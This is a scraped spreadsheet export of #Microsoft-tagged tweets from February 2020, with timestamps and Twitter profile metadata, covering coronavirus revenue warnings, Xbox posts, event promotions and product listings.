    <t>{'id': 1041343026650464256, 'id_str': '1041343026650464256', 'name': 'GetAllTech.Com', 'screen_name': 'getalltech', 'location': '', 'description': 'Here are different Steps to turn your PowerPoint presentation to a video or Convert PowerPoint to WMV with ease and which can open in any video player app.', 'url': 'https://t.co/nM1121V7oG', 'entities': {'url': {'urls': [{'url': 'https://t.co/nM1121V7oG', 'expanded_url': 'https://getalltech.com/', 'display_url': 'getalltech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 33, 'friends_count': 225, 'listed_count': 0, 'created_at': 'Sun Sep 16 15:08:19 +0000 2018', 'favourites_count': 373, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 430,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'http://pbs.twimg.com/profile_images/1041346418131300355/A7crOpiu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1041346418131300355/A7crOpiu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1041343026650464256/1537111281',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</si>
  <si>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04:48:18 +0000 2020</t>
  </si>
  <si>
    <t>Look how solid and consistent this shotgun is. #gears4 #gearsofwar #xboxone #xbox #xboxshare #plays #ape #gow #gaming #highlights #gow4 #sweaty #greatape #gnasher #microsoft #salty #twitch #mixer #stream #gamer #gears https://t.co/MSSAgX4YtJ</t>
  </si>
  <si>
    <t>{'id': 1172002434778128390, 'id_str': '1172002434778128390', 'name': 'The Great Ape', 'screen_name': '_GreatApe', 'location': '', 'description': 'Did someone say â€œpeanut butter?â€', 'url': 'https://t.co/gP29XQioFA', 'entities': {'url': {'urls': [{'url': 'https://t.co/gP29XQioFA', 'expanded_url': 'http://www.mixer.com/great_ape', 'display_url': 'mixer.com/great_ape', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 335, 'friends_count': 461, 'listed_count': 3, 'created_at': 'Thu Sep 12 04:22:33 +0000 2019', 'favourites_count': 4985, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2569, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1232650288420589568/AiJMQLsg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232650288420589568/AiJMQLsg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1172002434778128390/1574306748',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</si>
  <si>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04:46:06 +0000 2020</t>
  </si>
  <si>
    <t>Prepare your march calendars for the Microsoft certified workshops at NIT Warangal . Grab your seats while still at attractive prices. 
Visit https://t.co/ofvGIieM0N
#edufabrica #NITwarangal #workshops #microsoft https://t.co/wvtFX5G6Lp</t>
  </si>
  <si>
    <t>{'id': 1074579855923077122, 'id_str': '1074579855923077122', 'name': 'edufabrica', 'screen_name': 'edufabrica', 'location': '', 'description': 'Edufabrica is an Innovative attempt towards updating the new skills as per as Latest Industry trend.We believe that there is a constant need of skill Devlopment', 'url': 'https://t.co/uvVLGuBkAK', 'entities': {'url': {'urls': [{'url': 'https://t.co/uvVLGuBkAK', 'expanded_url': 'http://www.edufabrica.net', 'display_url': 'edufabrica.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11, 'friends_count': 20, 'listed_count': 0, 'created_at': 'Mon Dec 17 08:19:37 +0000 2018', 'favourites_count': 11, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 292,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'http://pbs.twimg.com/profile_images/1074580554744356864/x3YfUWkX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1074580554744356864/x3YfUWkX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1074579855923077122/1545035062',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</si>
  <si>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04:44:21 +0000 2020</t>
  </si>
  <si>
    <t>Stay Connected with Forexwhizz #forexsignals #cryptocurrency #forexlifestyle #investment #entrepreneur #crypto #business #investor #fx #UnitedStates #Banks #forecast #forexwhizz #microsoft https://t.co/Dwj8Nytu0P</t>
  </si>
  <si>
    <t>Thu Feb 27 04:42:20 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Says will Take Financial Hit from #Coronavirus Epidemic
https://t.co/9jUIxn8Ew9</t>
  </si>
  <si>
    <t>{'id': 11634672, 'id_str': '11634672', 'name': 'IndianWeb2', 'screen_name': 'indianweb2', 'location': 'India', 'description': 'An Independent News portal since 2007 covering #Technology, #Science, #Startups and Entrepreneurship News, opinions &amp; under-served topics.', 'url': 'https://t.co/fiZb39tqEG', 'entities': {'url': {'urls': [{'url': 'https://t.co/fiZb39tqEG', 'expanded_url': 'https://www.indianweb2.com', 'display_url': 'indianweb2.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4021, 'friends_count': 849, 'listed_count': 153, 'created_at': 'Sat Dec 29 16:59:15 +0000 2007', 'favourites_count': 226, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 31126,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'http://pbs.twimg.com/profile_images/2796597234/0200c5cf3cb3e2b51977976b4cb809cc_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2796597234/0200c5cf3cb3e2b51977976b4cb809cc_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/11634672/1563950645', 'profile_link_color': '012D5A', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'DFF1F0', 'profile_text_color': '2D3035', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 04:41:51 +0000 2020</t>
  </si>
  <si>
    <t>Intel delays 10nm Cannon Lake processor production to late 2019. #tech #microsoft https://t.co/D4UFHjgGgY https://t.co/YDonatXmFY</t>
  </si>
  <si>
    <t>{'id': 752034165336449024, 'id_str': '752034165336449024', 'name': 'Clair Eguy', 'screen_name': 'claireguyy', 'location': 'Alabama, USA', 'description': 'HiFi passion in the blood', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3716, 'friends_count': 4060, 'listed_count': 29, 'created_at': 'Sun Jul 10 06:58:12 +0000 2016', 'favourites_count': 11817, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3255, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/784457178467995649/BlVtwlUO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/784457178467995649/BlVtwlUO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/752034165336449024/1475864099',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</si>
  <si>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04:40:50 +0000 2020</t>
  </si>
  <si>
    <t>Where does the name of a wifi adapter originate in Windows?  #windows #microsoft #spiceworks #wifi #lan 
https://t.co/SEeQnG2QjI</t>
  </si>
  <si>
    <t>Thu Feb 27 04:38:09 +0000 2020</t>
  </si>
  <si>
    <t>#AIforHealth is #Microsoft's $40M program pillar aimed at empowering researchers and organizations to address challenges in health. @VentureBeat #cdwsocial https://t.co/JSLzeACCGC</t>
  </si>
  <si>
    <t>Thu Feb 27 04:37:34 +0000 2020</t>
  </si>
  <si>
    <t>Cyber security jobs - https://t.co/fPs7MxdFpI
#Microsoft #Computer #VetTech #Tech #Fafsa https://t.co/cuLPzUZwpd</t>
  </si>
  <si>
    <t>Thu Feb 27 04:36:46 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is slowly pulling the curtain back on its dual-screen Surface Duo and #Surface Neo. @TechCrunch #cdwsocial https://t.co/rFqXuaIcDj</t>
  </si>
  <si>
    <t>Thu Feb 27 04:33:21 +0000 2020</t>
  </si>
  <si>
    <t>Exciting news coming out of #Skyboxsecurity &amp;amp; #microsoft .... https://t.co/nFcSRQ4Igl</t>
  </si>
  <si>
    <t>{'id': 305002720, 'id_str': '305002720', 'name': 'rob rosiello', 'screen_name': 'rob_rosiello', 'location': '', 'description': 'EVP WW Sales &amp; Field Operations -@skyboxsecurity Total Visibility. Focused Protection. Opinions are my own.', 'url': 'https://t.co/f0UrzyJmpx', 'entities': {'url': {'urls': [{'url': 'https://t.co/f0UrzyJmpx', 'expanded_url': 'http://www.skyboxsecurity.com', 'display_url': 'skyboxsecurity.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 232, 'friends_count': 146, 'listed_count': 17, 'created_at': 'Wed May 25 13:39:35 +0000 2011', 'favourites_count': 259, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 500,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'http://pbs.twimg.com/profile_images/467768486165372928/jtWfpe_7_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/467768486165372928/jtWfpe_7_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/305002720/1400359752',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</si>
  <si>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04:30:48 +0000 2020</t>
  </si>
  <si>
    <t>#Coronavirus: #Microsoft warns of hit to #computer sales as #China grapples with the coronavirus outbreak. Microsoft said factories are re-opening across China, but this is happening slower than expected. https://t.co/MHEy3Je9vX #business #technology #covid19</t>
  </si>
  <si>
    <t>Thu Feb 27 04:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Besides first-mover advantage in the regional #language content space, @tandon_prashant of @1mgOfficial is also convinced that @BobbleKeyboard might have another edge over global players such as #Google, #Microsoft and #Baidu: https://t.co/NafoFFFdih #enterprise https://t.co/GjU8JW9zd5</t>
  </si>
  <si>
    <t>{'id': 48292184, 'id_str': '48292184', 'name': 'Outlook Business', 'screen_name': 'OutlookBusiness', 'location': '', 'description': '#Enterprise #Strategy #Investing #TheGoodLife #WOW2019 #LeadingEdge2019', 'url': 'https://t.co/XiWkEUrcBI', 'entities': {'url': {'urls': [{'url': 'https://t.co/XiWkEUrcBI', 'expanded_url': 'http://www.outlookbusiness.com/', 'display_url': 'outlookbusiness.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4812, 'friends_count': 8, 'listed_count': 209, 'created_at': 'Thu Jun 18 08:43:22 +0000 2009', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12131,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'http://pbs.twimg.com/profile_images/1023131669312811008/QPeZLtvl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1023131669312811008/QPeZLtvl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/48292184/1574334177', 'profile_link_color': '3B94D9', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '666666', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 04:29:26 +0000 2020</t>
  </si>
  <si>
    <t>Attend and/or speak at the 2020 #SQLSaturday in #LosAngeles! Your future is in your hands!
#Join #speakers from the #sqlfamily
Register here: https://t.co/jE8U5nRTfB  #sqlsatla #sqlserver #data #azure #aws #gcp #powerbi #microsoft #machinelearning #datascience @LoyolaMarymount https://t.co/FY7Pum0PfA</t>
  </si>
  <si>
    <t>{'id': 818992442619764736, 'id_str': '818992442619764736', 'name': 'SQLSaturdayinLA', 'screen_name': 'SQLSatLA', 'location': 'Los Angeles, CA', 'description': 'SQLSaturday is a free training event for professionals who use the Microsoft data platform. These community events offer content across data management, cloud a', 'url': 'https://t.co/UM2KFcEOea', 'entities': {'url': {'urls': [{'url': 'https://t.co/UM2KFcEOea', 'expanded_url': 'https://www.sqlsaturday.com/978', 'display_url': 'sqlsaturday.com/978', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 186, 'friends_count': 258, 'listed_count': 9, 'created_at': 'Wed Jan 11 01:26:29 +0000 2017', 'favourites_count': 501, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2762,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'http://pbs.twimg.com/profile_images/862700067253125120/dYrNDxJ3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/862700067253125120/dYrNDxJ3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/818992442619764736/1580885066',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</si>
  <si>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04:20:44 +0000 2020</t>
  </si>
  <si>
    <t>Check out Genuine Microsoft Xbox 360 AC Power Supply Brick Adapter 175W USED #Microsoft https://t.co/yZKtxntMwM via @eBay</t>
  </si>
  <si>
    <t>Thu Feb 27 04:19:09 +0000 2020</t>
  </si>
  <si>
    <t>Check out Lot of 5 Original Xbox 360 Consoles As Is Parts &amp;amp; Repair Only Lot 2 #Microsoft #SModels https://t.co/kgh01CJVF7 via @eBay</t>
  </si>
  <si>
    <t>Thu Feb 27 04:16:59 +0000 2020</t>
  </si>
  <si>
    <t>I will do your excel and spreadsheet data entry job for you
https://t.co/bjHtTpFnwB
#Excel #Microsoft #Data #datamining #socialmediamarketing #CopyPaste #Fiverr https://t.co/wdcmygwtS3</t>
  </si>
  <si>
    <t>{'id': 1170726126890565632, 'id_str': '1170726126890565632', 'name': 'subroto saha', 'screen_name': 'subroto65882023', 'location': 'CX5P+83 Natore', 'description': 'I have a dynamic ad challenging attitude towards my assigned responsibility. I am very much confident about, responsibility and skill. #digitalmarketer #SEO', 'url': 'https://t.co/cYNgxHhz2s', 'entities': {'url': {'urls': [{'url': 'https://t.co/cYNgxHhz2s', 'expanded_url': 'https://www.fiverr.com/subroto925871', 'display_url': 'fiverr.com/subroto925871', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 239, 'friends_count': 573, 'listed_count': 0, 'created_at': 'Sun Sep 08 15:51:02 +0000 2019', 'favourites_count': 33, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 75, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1234566660268314624/TDWHjG9V_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234566660268314624/TDWHjG9V_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1170726126890565632/1580226958',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</si>
  <si>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04:14:09 +0000 2020</t>
  </si>
  <si>
    <t>Yesterday, we had a great IAMCP Mumbai Chapter meeting with a fantastic knowledge session on Partner Incentives by Sunaina Raina, held at Microsoft Office Mumbai.
Sunaina talked about incentives and campaigns for indirect CSPs.
#iamcpindia #iamcp #mspartner #microsoft https://t.co/BZefgYT7fV</t>
  </si>
  <si>
    <t>Thu Feb 27 04:09:34 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft scraps quarterly revenue outlook due to coronavirus https://t.co/U6gctaJikU #Microsoft #Coronavirusoutbreak https://t.co/rk8e1KY8fJ</t>
  </si>
  <si>
    <t>{'id': 986750503, 'id_str': '986750503', 'name': 'Monicatwit', 'screen_name': 'MonicavanDelden', 'location': 'Haarlem', 'description': '#Security #Fraud #Scam #Human #Trafficking #Moneylaundering #AML #Risk #Policy #Financialcrime #CFT', 'url': 'https://t.co/L9C3042Etn', 'entities': {'url': {'urls': [{'url': 'https://t.co/L9C3042Etn', 'expanded_url': 'http://ultrascan-oscn.com', 'display_url': 'ultrascan-oscn.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 343, 'friends_count': 235, 'listed_count': 166, 'created_at': 'Mon Dec 03 14:33:10 +0000 2012', 'favourites_count': 444, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 80058,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'http://pbs.twimg.com/profile_images/493153403313192960/H_4zmrVH_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/493153403313192960/H_4zmrVH_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/986750503/1439842422',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</si>
  <si>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04:06:24 +0000 2020</t>
  </si>
  <si>
    <t>Have you heard of #Microsoft #Teams before? It's an online tool that provides a modern form of communication for better team collaboration..
Attend our live webinar on 3rd March to get to know Microsoft Teams. See you there! https://t.co/bRCF7y81VP
#MIEExpert  #MicrosoftEdu https://t.co/NNwMlQsXcY</t>
  </si>
  <si>
    <t>{'id': 781000166216204288, 'id_str': '781000166216204288', 'name': 'Using Tech Better', 'screen_name': 'Usingtechbetter', 'location': 'World Wide', 'description': 'Google, Microsoft, Apple Training #GAFE #MSFTEDU #APPLEEDU #STEM', 'url': 'https://t.co/Skp7calPdT', 'entities': {'url': {'urls': [{'url': 'https://t.co/Skp7calPdT', 'expanded_url': 'http://usingtechnologybetter.com/', 'display_url': 'usingtechnologybetter.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2804, 'friends_count': 3038, 'listed_count': 140, 'created_at': 'Wed Sep 28 05:18:44 +0000 2016', 'favourites_count': 114, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 11431, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/781302170658361345/jaCJdtis_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/781302170658361345/jaCJdtis_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/781000166216204288/1581551535',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</si>
  <si>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04:06:18 +0000 2020</t>
  </si>
  <si>
    <t>When I found a charge on my Am Ex bill for $10,000 for 1 boost on Facebook I said enoughs enough.They refused to discuss a refund. I will never forget that. Average boost or $30 to $50 each. #Facebook #Trump #Microsoft #IBM  They said I waited to long to dispute it #CommonSense https://t.co/PJUoXiJST9</t>
  </si>
  <si>
    <t>{'id': 1602845912, 'id_str': '1602845912', 'name': 'Royal Frenchmen Hotel Bar &amp; Hugh', 'screen_name': 'HughStiel1', 'location': 'New Orleans, Louisiana ', 'description': 'https://t.co/HxOJA4dc68 Boutique Hotel Bar &amp; Art Gallery Interest include News, Small Business, Music, Art, Travel, Tourism, Historical Preservation ...', 'url': 'https://t.co/s7XOouO4sa', 'entities': {'url': {'urls': [{'url': 'https://t.co/s7XOouO4sa', 'expanded_url': 'http://www.RoyalFrenchmenHotel.com', 'display_url': 'RoyalFrenchmenHotel.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/HxOJA4dc68', 'expanded_url': 'http://RoyalFrenchmenHotel.com', 'display_url': 'RoyalFrenchmenHotel.com', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 1477, 'friends_count': 4979, 'listed_count': 14, 'created_at': 'Thu Jul 18 07:45:03 +0000 2013', 'favourites_count': 5376, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8592,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'http://pbs.twimg.com/profile_images/587420645668978688/VWlQSt36_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/587420645668978688/VWlQSt36_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1602845912/1555566511',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</si>
  <si>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04:03:05 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/hsa2eEiasI 
#bigdata 
#SAP
#web #software #datagovernance
#digitalTransformation
#dataScience #dataScientist
@Chidambara09 #linux #china #usa #google #youtube #uk #cybersecurity #london
#cloudComputing
#Tech #innovation
#Emergingtech #who 
#Microsoft #apple#oracle</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</si>
  <si>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927205,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</si>
  <si>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04:01:57 +0000 2020</t>
  </si>
  <si>
    <t>So after the information bomb that #Microsoft dropped on the Xbox Series X recently, has it changed your opinion on them as a console maker? 
This fall, will you buy an #XboxSeriesX or a #PlayStation5?</t>
  </si>
  <si>
    <t>{'id': 1227754543187988483, 'id_str': '1227754543187988483', 'name': 'Daniels Domain', 'screen_name': 'daniels_domain', 'location': '', 'description': 'Video game news and discussion channel hosted by @_BrianDaniels', 'url': 'https://t.co/ST1wOKdo3Z', 'entities': {'url': {'urls': [{'url': 'https://t.co/ST1wOKdo3Z', 'expanded_url': 'http://tinyurl.com/DanielsDomain', 'display_url': 'tinyurl.com/DanielsDomain', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 24, 'friends_count': 24, 'listed_count': 1, 'created_at': 'Thu Feb 13 00:41:17 +0000 2020', 'favourites_count': 27, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 38, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1227754884625240065/JC5xmOoZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227754884625240065/JC5xmOoZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1227754543187988483/1581554653',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</si>
  <si>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04:00:08 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Smooth seas do not make skillfull sailors #AfricanProverb Use the calm before the storm to prepare. Thoughts all?  Like, share, comment.  #LinkedIn #CullenPHaynes #Lawyers #Microsoft #CirculateToPercolate @... https://t.co/dZfk8GweMi</t>
  </si>
  <si>
    <t>Thu Feb 27 03:59:11 +0000 2020</t>
  </si>
  <si>
    <t>Playing Squads and we are 6/6 on wins! How far can we go?!? Join in and watch the stream! #twitch #twitchtv #twitchstreamer #twitchcommunity #pc #pcgaming #microsoft #fun #WednesdayWisdom #trending #winning #pathtoaffiliate #fortnite #gaming 
https://t.co/yCF3AOgQi2</t>
  </si>
  <si>
    <t>{'id': 1209516150595428352, 'id_str': '1209516150595428352', 'name': 'EclecticHD', 'screen_name': 'EclecticHd', 'location': '', 'description': 'Always on a Streaming Service. Sponsored by: @TheRogueEnergy ðŸŽ®  | ðŸ’¥Twitch Affiliate ðŸ’¥', 'url': 'https://t.co/27QUYFi7ml', 'entities': {'url': {'urls': [{'url': 'https://t.co/27QUYFi7ml', 'expanded_url': 'http://twitch.tv/eclectichd', 'display_url': 'twitch.tv/eclectichd', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 134, 'friends_count': 231, 'listed_count': 0, 'created_at': 'Tue Dec 24 16:48:29 +0000 2019', 'favourites_count': 828, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1097, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1210952953005260801/A0rC_kBe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210952953005260801/A0rC_kBe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1209516150595428352/1577208495',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</si>
  <si>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03:58:08 +0000 2020</t>
  </si>
  <si>
    <t>#Startups #Microsoft Microsoft Adds Distributed Storage Blockchain to Azure https://t.co/wrsODW1tsX  | https://t.co/3JvnwYQBoJ https://t.co/QRk2UlbVME</t>
  </si>
  <si>
    <t>Thu Feb 27 03:58:07 +0000 2020</t>
  </si>
  <si>
    <t>#Ethereum #Microsoft Microsoft Adds 5 New Blockchain Partners to Azure https://t.co/XLKjZKAZSe  | https://t.co/3JvnwYQBoJ https://t.co/6BHW5h35u6</t>
  </si>
  <si>
    <t>Thu Feb 27 03:56:42 +0000 2020</t>
  </si>
  <si>
    <t>#SharePoint #Office365 #Microsoft  - Using the Graph API Powershell SDK  https://t.co/BALpxRNQri</t>
  </si>
  <si>
    <t>Thu Feb 27 03:55:24 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft becomes the #latest #corporate victim of #coronavirus chaos https://t.co/5j7YwqGnRf</t>
  </si>
  <si>
    <t>Thu Feb 27 03:54:23 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Is Latest #Tech Firm to Warn of #Coronavirus Impacts https://t.co/3a6eWmgeZf</t>
  </si>
  <si>
    <t>Thu Feb 27 03:53:10 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Issues Financial Warning Because of #Coronavirus https://t.co/1Ji6UdvJAz</t>
  </si>
  <si>
    <t>Thu Feb 27 03:52:13 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft warns that #Windows revenue wont meet its expectations due to #Covid-19 https://t.co/lsw1Hw2uii</t>
  </si>
  <si>
    <t>Thu Feb 27 03:50:39 +0000 2020</t>
  </si>
  <si>
    <t>Does anybody know where is the river Styx?
#running #redmond #microsoft https://t.co/kixgQJmEuc</t>
  </si>
  <si>
    <t>{'id': 57683351, 'id_str': '57683351', 'name': 'santy', 'screen_name': 'filtercoffee', 'location': 'Seattle', 'description': '26 bmi\nðŸ“· ðŸš´ðŸ½ ðŸƒðŸ½ðŸŽ¥ ðŸ“–', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 420, 'friends_count': 154, 'listed_count': 10, 'created_at': 'Fri Jul 17 16:16:32 +0000 2009', 'favourites_count': 265, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3436,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'http://pbs.twimg.com/profile_images/1217157086800277506/w8thCs1p_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217157086800277506/w8thCs1p_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/57683351/1373340574', 'profile_link_color': '969696', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'B9D8D6', 'profile_text_color': '4D918A', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 03:50:29 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Windows KW9-00475 10 HOME 32/64 Bit USB Flash Drive #32/64 #drive #Flash #Home #KW900475 #Microsoft #Windows https://t.co/hwYWZfNmYW</t>
  </si>
  <si>
    <t>Thu Feb 27 03:50:18 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Joins #Apple, #HP in Scrapping Outlooks on #CoronaVirus https://t.co/RDGFEfnxhs</t>
  </si>
  <si>
    <t>Thu Feb 27 03:49:09 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/Dcj18ttZD6 UNDERVALUE GIFT OK
#figure #japan #hobby #cosplay #RetroGaming #anime #manga #Nendoroid #figma #Game #Toys #gamers #Kotobukiya #alter #goodsmile #Nintendo #sega #Sony #Microsoft #FolloMe #Bandai #BandaiNamco #retwit #NeoGeo #ps5 #PlayStation5 #folloback</t>
  </si>
  <si>
    <t>{'id': 89532776, 'id_str': '89532776', 'name': 'Big In Japan', 'screen_name': 'biginjap', 'location': 'Tokyo', 'description': 'https://t.co/0tc2mCFE0F\nhttps://t.co/phRbUTb5gm\nhttps://t.co/xqSWmIF9pC', 'url': 'https://t.co/K4JCBkdEm5', 'entities': {'url': {'urls': [{'url': 'https://t.co/K4JCBkdEm5', 'expanded_url': 'http://www.biginjap.com/', 'display_url': 'biginjap.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/0tc2mCFE0F', 'expanded_url': 'http://biginjap.com', 'display_url': 'biginjap.com', 'indices': [0, 23]}, {'url': 'https://t.co/phRbUTb5gm', 'expanded_url': 'http://bij-auctions.com', 'display_url': 'bij-auctions.com', 'indices': [24, 47]}, {'url': 'https://t.co/xqSWmIF9pC', 'expanded_url': 'http://big-in-jap.blogspot.jp', 'display_url': 'big-in-jap.blogspot.jp', 'indices': [48, 71]}]}}, 'protected': False, 'followers_count': 20304, 'friends_count': 21536, 'listed_count': 70, 'created_at': 'Thu Nov 12 20:29:41 +0000 2009', 'favourites_count': 59, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 26331,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'http://pbs.twimg.com/profile_images/549227436/konatazerobi8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/549227436/konatazerobi8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/89532776/1489835247', 'profile_link_color': '990000', 'profile_sidebar_border_color': 'DFDFDF', 'profile_sidebar_fill_color': 'F3F3F3', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 03:47:18 +0000 2020</t>
  </si>
  <si>
    <t>@Infosys Fantastic #Infosys #Microsoft
#MicrosoftSecurity2020 #security #CyberSecurity</t>
  </si>
  <si>
